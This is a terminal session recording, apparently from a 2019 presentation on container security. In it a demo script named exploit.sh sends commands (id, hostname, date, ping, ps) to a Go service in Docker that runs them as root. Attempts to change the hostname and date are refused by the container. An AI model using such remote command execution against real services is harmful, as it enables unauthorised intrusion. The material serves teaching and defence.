[47.468916, "o", "\u001b[13;23r\u001b[H\u001b[23dhostname:\u001b[Cyou\u001b[Cmust\u001b[Cbe\u001b[Croot\u001b[Cto\u001b[Cchange\u001b[Cthe\u001b[Chost\u001b[Cname\r\n\u001b[?25l\u001b[13d-rw-r--r-- 1 root root 634 Feb  9 16:34 main.go\u001b[K\r\n$ ./exploit.sh id\u001b[K\r\ntrying to run: id\u001b[K\r\nuid=0(root) gid=0(root) groups=0(root)\u001b[K\r\n$ ./exploit.sh hostname\u001b[K\r\ntrying to run: hostname\u001b[K\r\n98eb980768f7\u001b[K\r\n$ ./exploit.sh hostname malware\u001b[K\r\ntrying to run: hostname malware\u001b[K\r\nhostname: you must be root to change the host name\u001b[K\r\n\u001b[K\u001b[1;24r\u001b[H\u001b[23d\u001b[?12l\u001b[?25h"]
[47.470135, "o", "\u001b[13;23r\u001b[H\u001b[23d$\u001b[1;24r\u001b[H\u001b[23;3H"]
[49.883512, "o", "\u001b[13;23r\u001b[H\u001b[23;3H.\u001b[1;24r\u001b[H\u001b[23;4H"]
[49.983831, "o", "\u001b[13;23r\u001b[H\u001b[23;4H/\u001b[1;24r\u001b[H\u001b[23;5H"]
[50.186257, "o", "\u001b[13;23r\u001b[H\u001b[23;5He\u001b[1;24r\u001b[H\u001b[23;6H"]
[50.365575, "o", "\u001b[13;23r\u001b[H\u001b[23;6Hx\u001b[1;24r\u001b[H\u001b[23;7H"]
[50.659485, "o", "\u001b[13;23r\u001b[H\u001b[23;7Hploit.sh\u001b[1;24r\u001b[H\u001b[23;16H"]
[51.369795, "o", "\u001b[13;23r\u001b[H\u001b[23;16Hh\u001b[1;24r\u001b[H\u001b[23;17H"]
[51.491449, "o", "\u001b[13;23r\u001b[H\u001b[23;17Ho\u001b[1;24r\u001b[H\u001b[23;18H"]
[51.549683, "o", "\u001b[13;23r\u001b[H\u001b[23;18Hs\u001b[1;24r\u001b[H\u001b[23;19H"]
[51.650242, "o", "\u001b[13;23r\u001b[H\u001b[23;19Ht\u001b[1;24r\u001b[H\u001b[23;20H"]
[51.745659, "o", "\u001b[13;23r\u001b[H\u001b[23;20Hn\u001b[1;24r\u001b[H\u001b[23;21H"]
[51.809227, "o", "\u001b[13;23r\u001b[H\u001b[23;21Ha\u001b[1;24r\u001b[H\u001b[23;22H"]
[51.930955, "o", "\u001b[13;23r\u001b[H\u001b[23;22Hm\u001b[1;24r\u001b[H\u001b[23;23H"]
[52.010309, "o", "\u001b[13;23r\u001b[H\u001b[23;23He\u001b[1;24r\u001b[H\u001b[23;24H"]
[52.291873, "o", "\u001b[13;23r\u001b[H\u001b[23d\n\u001b[?25l\u001b[13d$ ./exploit.sh id\u001b[K\r\ntrying to run: id\u001b[K\r\nuid=0(root) gid=0(root) groups=0(root)\u001b[K\r\n$ ./exploit.sh hostname\u001b[K\r\ntrying to run: hostname\u001b[K\r\n98eb980768f7\u001b[K\r\n$ ./exploit.sh hostname malware\u001b[K\r\ntrying to run: hostname malware\u001b[K\r\nhostname: you must be root to change the host name\u001b[K\r\n$ ./exploit.sh hostname\u001b[K\r\n\u001b[K\u001b[1;24r\u001b[H\u001b[23d\u001b[?12l\u001b[?25h"]
[52.294362, "o", "\u001b[13;23r\u001b[H\u001b[23dtrying\u001b[Cto\u001b[Crun:\u001b[Chostname\r\n\u001b[?25l\u001b[13dtrying to run: id\u001b[K\r\nuid=0(root) gid=0(root) groups=0(root)\u001b[K\r\n$ ./exploit.sh hostname\u001b[K\r\ntrying to run: hostname\u001b[K\r\n98eb980768f7\u001b[K\r\n$ ./exploit.sh hostname malware\u001b[K\r\ntrying to run: hostname malware\u001b[K\r\nhostname: you must be root to change the host name\u001b[K\r\n$ ./exploit.sh hostname\u001b[K\r\ntrying to run: hostname\u001b[K\r\n\u001b[K\u001b[1;24r\u001b[H\u001b[23d\u001b[?12l\u001b[?25h"]
[52.309732, "o", "\u001b[1;11r\u001b[H\u001b[11dRunning:\u001b[Chostname\r\n\u001b[?25l\u001b[H ---> 90b30419e6e8\u001b[K\r\nSuccessfully built 90b30419e6e8\u001b[K\r\nSuccessfully tagged golang-demo:latest\u001b[K\r\n$ ./docker-run.sh\u001b[K\r\nReady to receive requests on port 6666\u001b[K\r\nRunning: ls -l\u001b[K\r\nRunning: id\u001b[K\r\nRunning: hostname\u001b[K\r\nRunning: hostname malware\u001b[K\r\nRunning: hostname\u001b[K\r\n\u001b[K\u001b[1;24r\u001b[H\u001b[23d\u001b[?12l\u001b[?25h"]
[52.311774, "o", "\u001b[13;23r\u001b[H\u001b[23d98eb980768f7\r\n\u001b[?25l\u001b[13duid=0(root) gid=0(root) groups=0(root)\u001b[K\r\n$ ./exploit.sh hostname\u001b[K\r\ntrying to run: hostname\u001b[K\r\n98eb980768f7\u001b[K\r\n$ ./exploit.sh hostname malware\u001b[K\r\ntrying to run: hostname malware\u001b[K\r\nhostname: you must be root to change the host name\u001b[K\r\n$ ./exploit.sh hostname\u001b[K\r\ntrying to run: hostname\u001b[K\r\n98eb980768f7\u001b[K\r\n\u001b[K\u001b[1;24r\u001b[H\u001b[23d\u001b[?12l\u001b[?25h"]
[52.313115, "o", "\u001b[13;23r\u001b[H\u001b[23d$\u001b[1;24r\u001b[H\u001b[23;3H"]
[54.162746, "o", "\u001b[13;23r\u001b[H\u001b[23d\n\u001b[?25l\u001b[13d$ ./exploit.sh hostname\u001b[K\r\ntrying to run: hostname\u001b[K\r\n98eb980768f7\u001b[K\r\n$ ./exploit.sh hostname malware\u001b[K\r\ntrying to run: hostname malware\u001b[K\r\nhostname: you must be root to change the host name\u001b[K\r\n$ ./exploit.sh hostname\u001b[K\r\ntrying to run: hostname\u001b[K\r\n98eb980768f7\u001b[K\r\n$\u001b[K\r\n$\u001b[K\u001b[1;24r\u001b[H\u001b[23;3H\u001b[?12l\u001b[?25h"]
[55.461407, "o", "\u001b[13;23r\u001b[H\u001b[23d\n\u001b[?25l\u001b[13dtrying to run: hostname\u001b[K\r\n98eb980768f7\u001b[K\r\n$ ./exploit.sh hostname malware\u001b[K\r\ntrying to run: hostname malware\u001b[K\r\nhostname: you must be root to change the host name\u001b[K\r\n$ ./exploit.sh hostname\u001b[K\r\ntrying to run: hostname\u001b[K\r\n98eb980768f7\u001b[K\r\n$\u001b[K\r\n$\u001b[K\r\n$\u001b[K\u001b[1;24r\u001b[H\u001b[23;3H\u001b[?12l\u001b[?25h"]
[56.304765, "o", "\u001b[13;23r\u001b[H\u001b[23;3H.\u001b[1;24r\u001b[H\u001b[23;4H"]
[56.3943, "o", "\u001b[13;23r\u001b[H\u001b[23;4H/\u001b[1;24r\u001b[H\u001b[23;5H"]
[56.781325, "o", "\u001b[13;23r\u001b[H\u001b[23;5He\u001b[1;24r\u001b[H\u001b[23;6H"]
[56.942783, "o", "\u001b[13;23r\u001b[H\u001b[23;6Hx\u001b[1;24r\u001b[H\u001b[23;7H"]
[57.209138, "o", "\u001b[13;23r\u001b[H\u001b[23;7Hploit.sh\u001b[1;24r\u001b[H\u001b[23;16H"]
[58.530342, "o", "\u001b[13;23r\u001b[H\u001b[23;16Hd\u001b[1;24r\u001b[H\u001b[23;17H"]
[58.709683, "o", "\u001b[13;23r\u001b[H\u001b[23;17Ha\u001b[1;24r\u001b[H\u001b[23;18H"]
[58.952686, "o", "\u001b[13;23r\u001b[H\u001b[23;18Ht\u001b[1;24r\u001b[H\u001b[23;19H"]
[59.015779, "o", "\u001b[13;23r\u001b[H\u001b[23;19He\u001b[1;24r\u001b[H\u001b[23;20H"]
[59.335649, "o", "\u001b[13;23r\u001b[H\u001b[23d\n\u001b[?25l\u001b[13d98eb980768f7\u001b[K\r\n$ ./exploit.sh hostname malware\u001b[K\r\ntrying to run: hostname malware\u001b[K\r\nhostname: you must be root to change the host name\u001b[K\r\n$ ./exploit.sh hostname\u001b[K\r\ntrying to run: hostname\u001b[K\r\n98eb980768f7\u001b[K\r\n$\u001b[K\r\n$\u001b[K\r\n$ ./exploit.sh date\u001b[K\r\n\u001b[K\u001b[1;24r\u001b[H\u001b[23d\u001b[?12l\u001b[?25h"]
[59.337214, "o", "\u001b[13;23r\u001b[H\u001b[23dtrying\u001b[Cto\u001b[Crun:\u001b[Cdate\r\n\u001b[?25l\u001b[13d$ ./exploit.sh hostname malware\u001b[K\r\ntrying to run: hostname malware\u001b[K\r\nhostname: you must be root to change the host name\u001b[K\r\n$ ./exploit.sh hostname\u001b[K\r\ntrying to run: hostname\u001b[K\r\n98eb980768f7\u001b[K\r\n$\u001b[K\r\n$\u001b[K\r\n$ ./exploit.sh date\u001b[K\r\ntrying to run: date\u001b[K\r\n\u001b[K\u001b[1;24r\u001b[H\u001b[23d\u001b[?12l\u001b[?25h"]
[59.351152, "o", "\u001b[1;11r\u001b[H\u001b[11dRunning:\u001b[Cdate\r\n\u001b[?25l\u001b[HSuccessfully built 90b30419e6e8\u001b[K\r\nSuccessfully tagged golang-demo:latest\u001b[K\r\n$ ./docker-run.sh\u001b[K\r\nReady to receive requests on port 6666\u001b[K\r\nRunning: ls -l\u001b[K\r\nRunning: id\u001b[K\r\nRunning: hostname\u001b[K\r\nRunning: hostname malware\u001b[K\r\nRunning: hostname\u001b[K\r\nRunning: date\u001b[K\r\n\u001b[K\u001b[1;24r\u001b[H\u001b[23d\u001b[?12l\u001b[?25h"]
[59.369563, "o", "\u001b[13;23r\u001b[H\u001b[23dSat\u001b[CFeb\u001b[2C9\u001b[C16:39:52\u001b[CUTC\u001b[C2019\r\n\u001b[?25l\u001b[13dtrying to run: hostname malware\u001b[K\r\nhostname: you must be root to change the host name\u001b[K\r\n$ ./exploit.sh hostname\u001b[K\r\ntrying to run: hostname\u001b[K\r\n98eb980768f7\u001b[K\r\n$\u001b[K\r\n$\u001b[K\r\n$ ./exploit.sh date\u001b[K\r\ntrying to run: date\u001b[K\r\nSat Feb  9 16:39:52 UTC 2019\u001b[K\r\n\u001b[K\u001b[1;24r\u001b[H\u001b[23d\u001b[?12l\u001b[?25h"]
[59.37085, "o", "\u001b[13;23r\u001b[H\u001b[23d$\u001b[1;24r\u001b[H\u001b[23;3H"]
[60.620176, "o", "\u001b[13;23r\u001b[H\u001b[23;3H.\u001b[1;24r\u001b[H\u001b[23;4H"]
[60.683472, "o", "\u001b[13;23r\u001b[H\u001b[23;4H/\u001b[1;24r\u001b[H\u001b[23;5H"]
[60.914713, "o", "\u001b[13;23r\u001b[H\u001b[23;5He\u001b[1;24r\u001b[H\u001b[23;6H"]
[61.093135, "o", "\u001b[13;23r\u001b[H\u001b[23;6Hx\u001b[1;24r\u001b[H\u001b[23;7H"]
[61.351109, "o", "\u001b[13;23r\u001b[H\u001b[23;7Hploit.sh\u001b[1;24r\u001b[H\u001b[23;16H"]
[62.819948, "o", "\u001b[13;23r\u001b[H\u001b[23;16Hd\u001b[1;24r\u001b[H\u001b[23;17H"]
[63.00199, "o", "\u001b[13;23r\u001b[H\u001b[23;17Ha\u001b[1;24r\u001b[H\u001b[23;18H"]
[63.097264, "o", "\u001b[13;23r\u001b[H\u001b[23;18Ht\u001b[1;24r\u001b[H\u001b[23;19H"]
[63.171395, "o", "\u001b[13;23r\u001b[H\u001b[23;19He\u001b[1;24r\u001b[H\u001b[23;20H"]
[63.442109, "o", "\u001b[C"]
[64.505531, "o", "\u001b[13;23r\u001b[H\u001b[23;21H1\u001b[1;24r\u001b[H\u001b[23;22H"]
[64.710781, "o", "\u001b[13;23r\u001b[H\u001b[23;22H2\u001b[1;24r\u001b[H\u001b[23;23H"]
[65.234361, "o", "\u001b[13;23r\u001b[H\u001b[23;23H3\u001b[1;24r\u001b[H\u001b[23;24H"]
[65.384843, "o", "\u001b[13;23r\u001b[H\u001b[23;24H1\u001b[1;24r\u001b[H\u001b[23;25H"]
[66.049371, "o", "\u001b[13;23r\u001b[H\u001b[23;25H2\u001b[1;24r\u001b[H\u001b[23;26H"]
[66.513057, "o", "\u001b[13;23r\u001b[H\u001b[23;26H3\u001b[1;24r\u001b[H\u001b[23;27H"]
[67.327934, "o", "\u001b[13;23r\u001b[H\u001b[23;27H5\u001b[1;24r\u001b[H\u001b[23;28H"]
[67.585259, "o", "\u001b[13;23r\u001b[H\u001b[23;28H9\u001b[1;24r\u001b[H\u001b[23;29H"]
[70.309247, "o", "\u001b[13;23r\u001b[H\u001b[23;29H1\u001b[1;24r\u001b[H\u001b[23;30H"]
[70.990472, "o", "\u001b[13;23r\u001b[H\u001b[23;30H9\u001b[1;24r\u001b[H\u001b[23;31H"]
[71.660169, "o", "\u001b[13;23r\u001b[H\u001b[23;31H9\u001b[1;24r\u001b[H\u001b[23;32H"]
[71.835397, "o", "\u001b[13;23r\u001b[H\u001b[23;32H9\u001b[1;24r\u001b[H\u001b[23;33H"]
[74.165426, "o", "\u001b[13;23r\u001b[H\u001b[23d\n\u001b[?25l\u001b[13dhostname: you must be root to change the host name\u001b[K\r\n$ ./exploit.sh hostname\u001b[K\r\ntrying to run: hostname\u001b[K\r\n98eb980768f7\u001b[K\r\n$\u001b[K\r\n$\u001b[K\r\n$ ./exploit.sh date\u001b[K\r\ntrying to run: date\u001b[K\r\nSat Feb  9 16:39:52 UTC 2019\u001b[K\r\n$ ./exploit.sh date 123123591999\u001b[K\r\n\u001b[K\u001b[1;24r\u001b[H\u001b[23d\u001b[?12l\u001b[?25h"]
[74.166452, "o", "\u001b[13;23r\u001b[H\u001b[23dtrying\u001b[Cto\u001b[Crun:\u001b[Cdate\u001b[C123123591999\r\n\u001b[?25l\u001b[13d$ ./exploit.sh hostname\u001b[K\r\ntrying to run: hostname\u001b[K\r\n98eb980768f7\u001b[K\r\n$\u001b[K\r\n$\u001b[K\r\n$ ./exploit.sh date\u001b[K\r\ntrying to run: date\u001b[K\r\nSat Feb  9 16:39:52 UTC 2019\u001b[K\r\n$ ./exploit.sh date 123123591999\u001b[K\r\ntrying to run: date 123123591999\u001b[K\r\n\u001b[K\u001b[1;24r\u001b[H\u001b[23d\u001b[?12l\u001b[?25h"]
[74.181724, "o", "\u001b[1;11r\u001b[H\u001b[11dRunning:\u001b[Cdate\u001b[C123123591999\r\n\u001b[?25l\u001b[HSuccessfully tagged golang-demo:latest\u001b[K\r\n$ ./docker-run.sh\u001b[K\r\nReady to receive requests on port 6666\u001b[K\r\nRunning: ls -l\u001b[K\r\nRunning: id\u001b[K\r\nRunning: hostname\u001b[K\r\nRunning: hostname malware\u001b[K\r\nRunning: hostname\u001b[K\r\nRunning: date\u001b[K\r\nRunning: date 123123591999\u001b[K\r\n\u001b[K\u001b[1;24r\u001b[H\u001b[23d\u001b[?12l\u001b[?25h"]
[74.18389, "o", "\u001b[13;23r\u001b[H\u001b[23ddate:\u001b[Ccannot\u001b[Cset\u001b[Cdate:\u001b[COperation\u001b[Cnot\u001b[Cpermitted\r\n\u001b[?25l\u001b[13d98eb980768f7\u001b[K\r\n$\u001b[K\r\n$\u001b[K\r\n$ ./exploit.sh date\u001b[K\r\ntrying to run: date\u001b[K\r\nSat Feb  9 16:39:52 UTC 2019\u001b[K\r\n$ ./exploit.sh date 123123591999\u001b[K\r\ntrying to run: date 123123591999\u001b[K\r\ndate: cannot set date: Operation not permitted\u001b[K\r\nFri Dec 31 23:59:00 UTC 1999\u001b[K\r\n\u001b[K\u001b[1;24r\u001b[H\u001b[23d\u001b[?12l\u001b[?25h"]
[74.185176, "o", "\u001b[13;23r\u001b[H\u001b[23d$\u001b[1;24r\u001b[H\u001b[23;3H"]
[75.01582, "o", "\u001b[?25l\r\n\u001b[30m\u001b[42m[preso] 0:bash*                                         \"bmitch-asusr556l\" 11:40 09-Feb-19\u001b(B\u001b[m\u001b[23;3H\u001b[?12l\u001b[?25h"]
[77.029837, "o", "\u001b[13;23r\u001b[H\u001b[23;3H./exploit.sh\u001b[Cdate\u001b[C123123591999\u001b[1;24r\u001b[H\u001b[23;33H"]
[77.188668, "o", "\u001b[13D\u001b[K"]
[77.884545, "o", "\u001b[13;23r\u001b[H\u001b[23d\n\u001b[?25l\u001b[13d$\u001b[K\r\n$\u001b[K\r\n$ ./exploit.sh date\u001b[K\r\ntrying to run: date\u001b[K\r\nSat Feb  9 16:39:52 UTC 2019\u001b[K\r\n$ ./exploit.sh date 123123591999\u001b[K\r\ntrying to run: date 123123591999\u001b[K\r\ndate: cannot set date: Operation not permitted\u001b[K\r\nFri Dec 31 23:59:00 UTC 1999\u001b[K\r\n$ ./exploit.sh date\u001b[K\r\n\u001b[K\u001b[1;24r\u001b[H\u001b[23d\u001b[?12l\u001b[?25h"]
[77.885966, "o", "\u001b[13;23r\u001b[H\u001b[23dtrying\u001b[Cto\u001b[Crun:\u001b[Cdate\r\n\u001b[?25l\u001b[13d$\u001b[K\r\n$ ./exploit.sh date\u001b[K\r\ntrying to run: date\u001b[K\r\nSat Feb  9 16:39:52 UTC 2019\u001b[K\r\n$ ./exploit.sh date 123123591999\u001b[K\r\ntrying to run: date 123123591999\u001b[K\r\ndate: cannot set date: Operation not permitted\u001b[K\r\nFri Dec 31 23:59:00 UTC 1999\u001b[K\r\n$ ./exploit.sh date\u001b[K\r\ntrying to run: date\u001b[K\r\n\u001b[K\u001b[1;24r\u001b[H\u001b[23d\u001b[?12l\u001b[?25h"]
[77.901941, "o", "\u001b[1;11r\u001b[H\u001b[11dRunning:\u001b[Cdate\r\n\u001b[?25l\u001b[H$ ./docker-run.sh\u001b[K\r\nReady to receive requests on port 6666\u001b[K\r\nRunning: ls -l\u001b[K\r\nRunning: id\u001b[K\r\nRunning: hostname\u001b[K\r\nRunning: hostname malware\u001b[K\r\nRunning: hostname\u001b[K\r\nRunning: date\u001b[K\r\nRunning: date 123123591999\u001b[K\r\nRunning: date\u001b[K\r\n\u001b[K\u001b[1;24r\u001b[H\u001b[23d\u001b[?12l\u001b[?25h"]
[77.903871, "o", "\u001b[13;23r\u001b[H\u001b[23dSat\u001b[CFeb\u001b[2C9\u001b[C16:40:10\u001b[CUTC\u001b[C2019\r\n\u001b[?25l\u001b[13d$ ./exploit.sh date\u001b[K\r\ntrying to run: date\u001b[K\r\nSat Feb  9 16:39:52 UTC 2019\u001b[K\r\n$ ./exploit.sh date 123123591999\u001b[K\r\ntrying to run: date 123123591999\u001b[K\r\ndate: cannot set date: Operation not permitted\u001b[K\r\nFri Dec 31 23:59:00 UTC 1999\u001b[K\r\n$ ./exploit.sh date\u001b[K\r\ntrying to run: date\u001b[K\r\nSat Feb  9 16:40:10 UTC 2019\u001b[K\r\n\u001b[K\u001b[1;24r\u001b[H\u001b[23d\u001b[?12l\u001b[?25h"]
[77.905099, "o", "\u001b[13;23r\u001b[H\u001b[23d$\u001b[1;24r\u001b[H\u001b[23;3H"]
[80.390427, "o", "\u001b[13;23r\u001b[H\u001b[23d\n\u001b[?25l\u001b[13dtrying to run: date\u001b[K\r\nSat Feb  9 16:39:52 UTC 2019\u001b[K\r\n$ ./exploit.sh date 123123591999\u001b[K\r\ntrying to run: date 123123591999\u001b[K\r\ndate: cannot set date: Operation not permitted\u001b[K\r\nFri Dec 31 23:59:00 UTC 1999\u001b[K\r\n$ ./exploit.sh date\u001b[K\r\ntrying to run: date\u001b[K\r\nSat Feb  9 16:40:10 UTC 2019\u001b[K\r\n$\u001b[K\r\n$\u001b[K\u001b[1;24r\u001b[H\u001b[23;3H\u001b[?12l\u001b[?25h"]
[81.144467, "o", "\u001b[13;23r\u001b[H\u001b[23d\n\u001b[?25l\u001b[13dSat Feb  9 16:39:52 UTC 2019\u001b[K\r\n$ ./exploit.sh date 123123591999\u001b[K\r\ntrying to run: date 123123591999\u001b[K\r\ndate: cannot set date: Operation not permitted\u001b[K\r\nFri Dec 31 23:59:00 UTC 1999\u001b[K\r\n$ ./exploit.sh date\u001b[K\r\ntrying to run: date\u001b[K\r\nSat Feb  9 16:40:10 UTC 2019\u001b[K\r\n$\u001b[K\r\n$\u001b[K\r\n\u001b[K\u001b[1;24r\u001b[H\u001b[23d\u001b[?12l\u001b[?25h"]
[81.144688, "o", "\u001b[13;23r\u001b[H\u001b[23d$\u001b[1;24r\u001b[H\u001b[23;3H"]
[81.910118, "o", "\u001b[13;23r\u001b[H\u001b[23;3H.\u001b[1;24r\u001b[H\u001b[23;4H"]
[81.946339, "o", "\u001b[13;23r\u001b[H\u001b[23;4H/\u001b[1;24r\u001b[H\u001b[23;5H"]
[82.08463, "o", "\u001b[13;23r\u001b[H\u001b[23;5He\u001b[1;24r\u001b[H\u001b[23;6H"]
[82.265486, "o", "\u001b[13;23r\u001b[H\u001b[23;6Hx\u001b[1;24r\u001b[H\u001b[23;7H"]
[82.57181, "o", "\u001b[13;23r\u001b[H\u001b[23;7Hploit.sh\u001b[1;24r\u001b[H\u001b[23;16H"]
[83.960905, "o", "\u001b[13;23r\u001b[H\u001b[23;16Hp\u001b[1;24r\u001b[H\u001b[23;17H"]
[84.408691, "o", "\u001b[13;23r\u001b[H\u001b[23;17Hi\u001b[1;24r\u001b[H\u001b[23;18H"]
[84.58309, "o", "\u001b[13;23r\u001b[H\u001b[23;18Hn\u001b[1;24r\u001b[H\u001b[23;19H"]
[84.785602, "o", "\u0007"]
[85.956061, "o", "\u001b[13;23r\u001b[H\u001b[23;19Hg\u001b[1;24r\u001b[H\u001b[23;20H"]
[86.803048, "o", "\u001b[C"]
[87.235416, "o", "\u001b[13;23r\u001b[H\u001b[23;21H-\u001b[1;24r\u001b[H\u001b[23;22H"]
[87.469534, "o", "\u001b[13;23r\u001b[H\u001b[23;22Hc\u001b[1;24r\u001b[H\u001b[23;23H"]
[87.63589, "o", "\u001b[C"]
[88.838825, "o", "\u001b[13;23r\u001b[H\u001b[23;24H1\u001b[1;24r\u001b[H\u001b[23;25H"]
[89.188733, "o", "\u001b[C"]
[89.669842, "o", "\u001b[13;23r\u001b[H\u001b[23;26H8\u001b[1;24r\u001b[H\u001b[23;27H"]
[89.890837, "o", "\u001b[13;23r\u001b[H\u001b[23;27H.\u001b[1;24r\u001b[H\u001b[23;28H"]
[90.165903, "o", "\u001b[13;23r\u001b[H\u001b[23;28H8\u001b[1;24r\u001b[H\u001b[23;29H"]
[90.379619, "o", "\u001b[13;23r\u001b[H\u001b[23;29H.\u001b[1;24r\u001b[H\u001b[23;30H"]
[90.661554, "o", "\u001b[13;23r\u001b[H\u001b[23;30H8\u001b[1;24r\u001b[H\u001b[23;31H"]
[90.913859, "o", "\u001b[13;23r\u001b[H\u001b[23;31H.\u001b[1;24r\u001b[H\u001b[23;32H"]
[91.277306, "o", "\u001b[13;23r\u001b[H\u001b[23;32H8\u001b[1;24r\u001b[H\u001b[23;33H"]
[92.766956, "o", "\u001b[13;23r\u001b[H\u001b[23d\n\u001b[?25l\u001b[13d$ ./exploit.sh date 123123591999\u001b[K\r\ntrying to run: date 123123591999\u001b[K\r\ndate: cannot set date: Operation not permitted\u001b[K\r\nFri Dec 31 23:59:00 UTC 1999\u001b[K\r\n$ ./exploit.sh date\u001b[K\r\ntrying to run: date\u001b[K\r\nSat Feb  9 16:40:10 UTC 2019\u001b[K\r\n$\u001b[K\r\n$\u001b[K\r\n$ ./exploit.sh ping -c 1 8.8.8.8\u001b[K\r\n\u001b[K\u001b[1;24r\u001b[H\u001b[23d\u001b[?12l\u001b[?25h"]
[92.769279, "o", "\u001b[13;23r\u001b[H\u001b[23dtrying\u001b[Cto\u001b[Crun:\u001b[Cping\u001b[C-c\u001b[C1\u001b[C8.8.8.8\r\n\u001b[?25l\u001b[13dtrying to run: date 123123591999\u001b[K\r\ndate: cannot set date: Operation not permitted\u001b[K\r\nFri Dec 31 23:59:00 UTC 1999\u001b[K\r\n$ ./exploit.sh date\u001b[K\r\ntrying to run: date\u001b[K\r\nSat Feb  9 16:40:10 UTC 2019\u001b[K\r\n$\u001b[K\r\n$\u001b[K\r\n$ ./exploit.sh ping -c 1 8.8.8.8\u001b[K\r\ntrying to run: ping -c 1 8.8.8.8\u001b[K\r\n\u001b[K\u001b[1;24r\u001b[H\u001b[23d\u001b[?12l\u001b[?25h"]
[92.784248, "o", "\u001b[1;11r\u001b[H\u001b[11dRunning:\u001b[Cping\u001b[C-c\u001b[C1\u001b[C8.8.8.8\r\n\u001b[?25l\u001b[HReady to receive requests on port 6666\u001b[K\r\nRunning: ls -l\u001b[K\r\nRunning: id\u001b[K\r\nRunning: hostname\u001b[K\r\nRunning: hostname malware\u001b[K\r\nRunning: hostname\u001b[K\r\nRunning: date\u001b[K\r\nRunning: date 123123591999\u001b[K\r\nRunning: date\u001b[K\r\nRunning: ping -c 1 8.8.8.8\u001b[K\r\n\u001b[K\u001b[1;24r\u001b[H\u001b[23d\u001b[?12l\u001b[?25h"]
[92.858975, "o", "\u001b[13;23r\u001b[H\u001b[23dPING\u001b[C8.8.8.8\u001b[C(8.8.8.8)\u001b[C56(84)\u001b[Cbytes\u001b[Cof\u001b[Cdata.\r\n\u001b[?25l\u001b[13d$\u001b[K\r\n$\u001b[K\r\n$ ./exploit.sh ping -c 1 8.8.8.8\u001b[K\r\ntrying to run: ping -c 1 8.8.8.8\u001b[K\r\nPING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.\u001b[K\r\n64 bytes from 8.8.8.8: icmp_seq=1 ttl=121 time=9.37 ms\u001b[K\r\n\u001b[K\r\n--- 8.8.8.8 ping statistics ---\u001b[K\r\n1 packets transmitted, 1 received, 0% packet loss, time 0ms\u001b[K\r\nrtt min/avg/max/mdev = 9.373/9.373/9.373/0.000 ms\u001b[K\r\n\u001b[K\u001b[1;24r\u001b[H\u001b[23d\u001b[?12l\u001b[?25h"]
[92.860229, "o", "\u001b[13;23r\u001b[H\u001b[23d$\u001b[1;24r\u001b[H\u001b[23;3H"]
[95.253796, "o", "\u001b[13;23r\u001b[H\u001b[23d\n\u001b[?25l\u001b[13d$\u001b[K\r\n$ ./exploit.sh ping -c 1 8.8.8.8\u001b[K\r\ntrying to run: ping -c 1 8.8.8.8\u001b[K\r\nPING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.\u001b[K\r\n64 bytes from 8.8.8.8: icmp_seq=1 ttl=121 time=9.37 ms\u001b[K\r\n\u001b[K\r\n--- 8.8.8.8 ping statistics ---\u001b[K\r\n1 packets transmitted, 1 received, 0% packet loss, time 0ms\u001b[K\r\nrtt min/avg/max/mdev = 9.373/9.373/9.373/0.000 ms\u001b[K\r\n$\u001b[K\r\n\u001b[K\u001b[1;24r\u001b[H\u001b[23d\u001b[?12l\u001b[?25h\u001b[13;23r\u001b[H\u001b[23d$"]
[95.254028, "o", "\u001b[1;24r\u001b[H\u001b[23;3H"]
[96.527891, "o", "\u001b[13;23r\u001b[H\u001b[23;3H.\u001b[1;24r\u001b[H\u001b[23;4H"]
[96.607035, "o", "\u001b[13;23r\u001b[H\u001b[23;4H/\u001b[1;24r\u001b[H\u001b[23;5H"]
[97.188967, "o", "\u001b[13;23r\u001b[H\u001b[23;5He\u001b[1;24r\u001b[H\u001b[23;6H"]
[97.356836, "o", "\u001b[13;23r\u001b[H\u001b[23;6Hx\u001b[1;24r\u001b[H\u001b[23;7H"]
[97.633738, "o", "\u001b[13;23r\u001b[H\u001b[23;7Hploit.sh\u001b[1;24r\u001b[H\u001b[23;16H"]
[98.147594, "o", "\u001b[13;23r\u001b[H\u001b[23;16Hp\u001b[1;24r\u001b[H\u001b[23;17H"]
[98.237274, "o", "\u001b[13;23r\u001b[H\u001b[23;17Hs\u001b[1;24r\u001b[H\u001b[23;18H"]
[98.390086, "o", "\u001b[C"]
[98.627922, "o", "\u001b[13;23r\u001b[H\u001b[23;19H-\u001b[1;24r\u001b[H\u001b[23;20H"]
[98.69625, "o", "\u001b[13;23r\u001b[H\u001b[23;20He\u001b[1;24r\u001b[H\u001b[23;21H"]
[98.813578, "o", "\u001b[13;23r\u001b[H\u001b[23;21Hf\u001b[1;24r\u001b[H\u001b[23;22H"]
[99.318219, "o", "\u001b[13;23r\u001b[H\u001b[23d\n\u001b[?25l\u001b[13d$ ./exploit.sh ping -c 1 8.8.8.8\u001b[K\r\ntrying to run: ping -c 1 8.8.8.8\u001b[K\r\nPING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.\u001b[K\r\n64 bytes from 8.8.8.8: icmp_seq=1 ttl=121 time=9.37 ms\u001b[K\r\n\u001b[K\r\n--- 8.8.8.8 ping statistics ---\u001b[K\r\n1 packets transmitted, 1 received, 0% packet loss, time 0ms\u001b[K\r\nrtt min/avg/max/mdev = 9.373/9.373/9.373/0.000 ms\u001b[K\r\n$\u001b[K\r\n$ ./exploit.sh ps -ef\u001b[K\r\n\u001b[K\u001b[1;24r\u001b[H\u001b[23d\u001b[?12l\u001b[?25h"]
[99.319686, "o", "\u001b[13;23r\u001b[H\u001b[23dtrying\u001b[Cto\u001b[Crun:\u001b[Cps\u001b[C-ef\r\n\u001b[?25l\u001b[13dtrying to run: ping -c 1 8.8.8.8\u001b[K\r\nPING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.\u001b[K\r\n64 bytes from 8.8.8.8: icmp_seq=1 ttl=121 time=9.37 ms\u001b[K\r\n\u001b[K\r\n--- 8.8.8.8 ping statistics ---\u001b[K\r\n1 packets transmitted, 1 received, 0% packet loss, time 0ms\u001b[K\r\nrtt min/avg/max/mdev = 9.373/9.373/9.373/0.000 ms\u001b[K\r\n$\u001b[K\r\n$ ./exploit.sh ps -ef\u001b[K\r\ntrying to run: ps -ef\u001b[K\r\n\u001b[K\u001b[1;24r\u001b[H\u001b[23d\u001b[?12l\u001b[?25h"]
